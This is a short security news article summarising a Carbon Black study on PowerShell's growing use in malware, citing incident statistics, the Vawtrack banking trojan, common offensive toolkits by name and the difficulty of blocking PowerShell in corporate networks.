According to a study made by Carbon Black, Microsoft’s PowerShell task automation framework is getting more and more popular tool for coding and enhancing malware these days.
The collected data from over 1,100 separate investigations from 20 security firms shows that PowerShell was used in 38% of all the attacks they analyzed. The respondents claimed that in 31% of all the cases, their clients reported not receiving any warnings about the ongoing attacks.
PowerShell is known as a favorite tool for targeted attacks and commodity malware. By now, PowerShell malware was part of a shotgun approach in 87% of cases, while for the rest, the malware was part of a targeted attack, specific to hacker groups and state-sponsored actors.
Shotgun approach malware means common malware such as ransomware, click fraud bots, and other threats where the hacker doesn’t care whom they infect as long as they infect someone.
According to Carbon Black, over half of these incidents were related to Vawtrack – a banking trojan which heavily uses PowerShell in its source code.
Respondents stated that, usually, the PowerShell-based malware was distributed via social engineering techniques and that it targeted mostly corporate networks and financial data, aiming to steal information or disrupt services.
Due to the fact that PowerShell is a ubiquitous technology within the Windows ecosystem, detecting PowerShell-based malware is almost impossible, since there’s no technical method of distinguishing between good and malicious PowerShell source code.
Considering the above-mentioned, the security researchers expect PowerShell to become a prevalent technology in malware design, but also because toolkits like PowerSploit, PowerShell Empire, p0wnedShell, and the Social-Engineer Toolkit are making it easier to use PowerShell exploits out of the box.
When it comes to blocking PowerShell, the experts claim that this is impractical.
“Unlike other common technologies such as Java and Adobe Flash, which IT administrators can more easily remove or ban, many organizations and applications rely on PowerShell to manage their critical systems.”
One of the most recent PowerShell-based malware families is the so called PowerWare ransomware.